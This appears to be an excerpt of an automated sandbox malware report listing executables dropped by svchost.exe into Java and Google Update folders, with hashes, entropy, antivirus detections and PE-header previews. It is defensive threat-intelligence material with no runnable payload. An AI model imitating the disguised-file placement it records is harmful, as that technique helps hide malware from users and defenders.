                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:94B543045DD8EA1086CC64F30D43BB2429FD28BADCAF942F181F68ABE67D015F
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:837735DA2CCE3C5E7FD09BC7438C09549F012A8DE2509992A4F5EF663BB8C10B5175D6B4915B93BD7637542731AE46D49E55FFA942EFCCDEF8BFE49D3CC55134
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@.......I.......................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1375232
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.4467859134983065
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:0nU/h/4K2sqjnhMgeiCl7G0nehbGZpbD:0U/V6Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:81FC264862E60D5F1852EA1EB9447A36
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F83D9755309B0753E1B02D11C15E356775D1A3FB
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D3280B4460843CCF50F427C8AD33DCB1FB0489FC902EBD3F96331C77A8ADFE1F
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A84A4B3EC6FE0E2B7D76FB3A27A054CB301FDB632F25B904C64B93EB78FDA301A38A57D25EE90636C5460F7234BD421B48F74E13F8402E7B8A79E45FB231FF15
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@.......`.......................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1513984
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.483710133582975
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:4x71iBLZ05jNTmJWExdsqjnhMgeiCl7G0nehbGZpbD:4xhiHIjNgBDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:973BBB6F910328C0FE376E2BE0331302
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2F07112E3A35C41EA7189456CF97B141B8252C1F
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:408414715FECF9E362C7803CCD153AEC36BC97ECD592A177044A5F5A86B3ED6E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:22545009AEFF0F4AFC5188FDAB197E6F9249866D07902BDC2749187A1350B5104657A2F710C5408FD97BEF8A560C2C9132F898035A00788D8FF46E3648E8D91D
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@.................................I]..........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1419264
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.466685736744621
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:elnRklQ6fgJcEwixPsqjnhMgeiCl7G0nehbGZpbD:qoRfgJcEwCzDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:34B7D6D27C82B6EB8EB026122A9E6CB9
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F8798502AFBB32C9AA7559DB7B28514ADA685A88
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:73605E0DD90218501D74A8BA07CE236A986C9E5A61C994162C264FCCCD90558F
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7DD7B77A5B227A0CBB5D3F6A172B3C7B2FBF95F22A3F046D2334CB561806D7D6859BE7A66FC0D1910176A8F0880C62ABBEC74180BD3DE82F76191BC6E2B86EA2
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|../../../L...../L...8./+...../+...../+...../L...../L...../../4./..../.s/../..../Rich../........................PE..L...A..d.............................s............@.........................................................................<........P...2..............................T...........................8...@............................................text............................... ..`.rdata...%.......&..................@..@.data...d(... ......................@....rsrc....2...P...4..................@..@.reloc...p.......`...H..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1522176
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.496505569883166
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:oW25k8hb0Haw+x/sqjnhMgeiCl7G0nehbGZpbD:oWyk8SHawmjDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:68D3111ED155AAFA5B90C88779AAC82B
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:4AEAD62375F3820A1D9298E01DB464E0A0143541
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D91F032DB4338A075D3BA2C965755D10232E7B643892388D0A313A4BDB92E694
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A38A719C81D67548F1EF154AD76CFF6817B5FC57D111BD83B106CB88FFA7D13864144371D8B193D28C12C37F8910F8160FC5AE4204E48E1DA68F1FA66B8343FD
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.s.%.s.%.s.%...$ms.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%.s.%xr.%...$.s.%...%.s.%...$.s.%Rich.s.%................PE..d...X..d.........."..........R......L..........@....................................B~.... ..................................................M....... ...2.......,................... ..T............................ ..................(............................text............................... ..`.rdata..............................@..@.data....6...p.......X..............@....pdata...,...........j..............@..@_RDATA..............................@..@.gxfg...0...........................@..@.gehcont............................@..@.rsrc....2... ...4..................@..@.reloc...`...`...P..................@...........................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1282048
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1639219693939
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:yWP/aK2vB+wXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:yKCKABnsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:011790140BE64FB0B670DAB37CF16EDD
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:AA00D3AAD675F8D252CFD68608B96E4ABCAE902A
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:51A98F0996BC4FD5A9AF1F2A8751326840431B098E9625C57C430681CEE31B4D
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:61DB76C1BD88C1A3E28B9E621E108C22F2DA5199FBC0A572B8C120FCEC76B4F48781D650A9C6237FD94C358C2E23CEB48EC5AC45E34E1FE1DD8A7998CE685945
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U.*.Q..U.*.V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L...9..d.................D..........Ru.......`....@.................................&r......................................P...x....... ...........................p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...`.......P...@..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1228288
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1620004177657535
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:eO7cCNWB+09GXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:bjNWBPAsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A0BD97027BB683B0234F1892CC013E0D
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8FC42D535E6E57D01B6867589BB4D648FEAF6AE9
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:40172C4D4C95BE9D260D0C28CEC4B700515F7BBF61433911A94FD004D3326357
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E9C4B186E22388E83A14E0FDFF47EB37638C092F610F9F8238BD73311EA8B6E06260F28360524D64BD2794B73CFDF06C62CF868D131AD5DA3711C5B8791A5FEA
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...:..d..........................................@..........................................................................5..<....`..p2...........................+..T...........................X+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1302528
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.2388943740562475
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:RihRyhdsRrSsqjnhMgeiCl7G0nehbGZpbD:RihsoRWDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:41BA9AD61293135A377ECE13C1DD761C
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:32DAD1701F0BCAA8297CFA0A08F8E5D133594A6A
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8EC1329BC3C478050868EE334DA31E95A97BE4D5F329B9625BCBF6B2B06261B4
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CB28BE9025D4B0DF26E3145DA48E2033912980624610A3DADE1E8474D2B5308A370165016E0FF7CABAD2927F7ADD1A718E0DBDC3499B7C478BFA21FEEDAF1CE3
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X..X..X..~*...X..~*..X...2..X...2..X...2...X...3..X..~*..X..~*..X..X..?Y...3..X...3..X..Rich.X..........PE..d...A..d.........."......R...z.......R.........@.............................p......8'.... ..................................................p..x....................................V..T...........................0W...............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...x3...........d..............@....pdata...............t..............@..@_RDATA..............................@..@.gxfg...............................@..@.gehcont............................@..@.reloc...P... ...@..................@...........................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1342464
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.350982983278274
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:n1FDmRF+wpx/QafxsqjnhMgeiCl7G0nehbGZpbD:TmRF+wn/JfFDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8F4D45789ED8093FD19B69B378115845
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C873940C97D5CE252FAE3F2DA9C409E6C51F9B46
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:2002B0664E451D57FFF124E5B4798219445DC9E07EFA52F6B38EE494D39DB00D
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CBA73D6133F45A5BAD7A502F7797A4BA460CAB9AFA177B57B847C4B47B6B2B10B8C293C5B674FE8EA36E3C00AAD4A816B6F7FAE23EAC892EAF1D85220DBEC6A9
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|6..8W..8W..8W...%..6W...%...W...=...W...=...W...=..{W...%.. W...%..#W..8W...V..L<...W..L<s.9W..L<..9W..Rich8W..................PE..L...Y..d.....................r....................@.................................0e...............................................0...2..............................T...........................h...@............................................text...e........................... ..`.rdata..b...........................@..@.data....'..........................@....rsrc....2...0...4..................@..@.reloc...p...p...`..................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1228288
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.161953141208675
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:T2Ae621B+0YEXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:iE21BPDsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:95FF9BF73332B9BBF4625343BC8D5704
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:11D325FE9B82BEFAE63F587528E4BCBC061E3375
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A098284069A8BFBEBD07B35596D2090399C0D8BDA1A2B6BDD9DD7A929F0A64C7
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:07817332F99BE2EDD2B4E04B0D421A5B1CA3C310D117791A6BF7A6E453A402A229DE8727CA2DB64EDAD52FB8791ED012795312989ECA716707798BEC983579EB
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...;..d..........................................@..........................................................................5..<....`..p2...........................+..T...........................h+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):105669632
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.999989846073561
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3145728:mLAKHgDx/oat8qdTsdZDAE1mXXaYS79zDIICU:kBWx/pt8U7E6aZRfIICU
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1976EEE50ACF05BEF757801637AC385A
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EDBF423A5FC1F199ABFE1213DDACA845353D15F8
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A1BDA4E18A2F51ECF04F845C006F00009256824729130644DD7D7AFF8D89F801
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E46746243CBB9CC814C6A6DE34C296DB5CFA1A16A726A7B9DAFA6E401713913DBF52807A8FFA33171B6F80297B5E846C76AF0961F75BED989811E82531090C4C
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......4...LC................@..............................L.....u.L... ..................................................X..P........+C.....|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc....+C......,C..X..............@..@.reloc........C.......C.............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1158144
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.068038328907574
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:cnXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:cnsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:7DEBF1CAB6D142C78175DBA02F9A6045
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D599FFB933E2824567594657C03D4C7AD2AD7A82
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A1E076D0934202A37464EC7E23169D621CF0ACDE2ACFE2E2BDCF5BE243EBF59C
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:184E862D6B8F3E20ED725C11B1F10D8C89576F6980E0AAEE6F9BBC9EBBDCE4953CE4890CEB38A7A9EAF39871496E7B88AE505847DFA1700677DFCD276F104D79
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.C.VWC.VWC.VWJ..WS.VW!.WVA.VW!.SV\.VW!.RVO.VW!.UVB.VWW.WVJ.VWC.WW!.VW.SVB.VW..WB.VW.TVB.VWRichC.VW........PE..L.....d.................8...6.......4.......P....@..................................[......................................$i.......................................b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc...P.......@...l..............@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.03236993434232
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:MKQXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:ZQsqjnhMgeiCl7G0nehbGZpbD
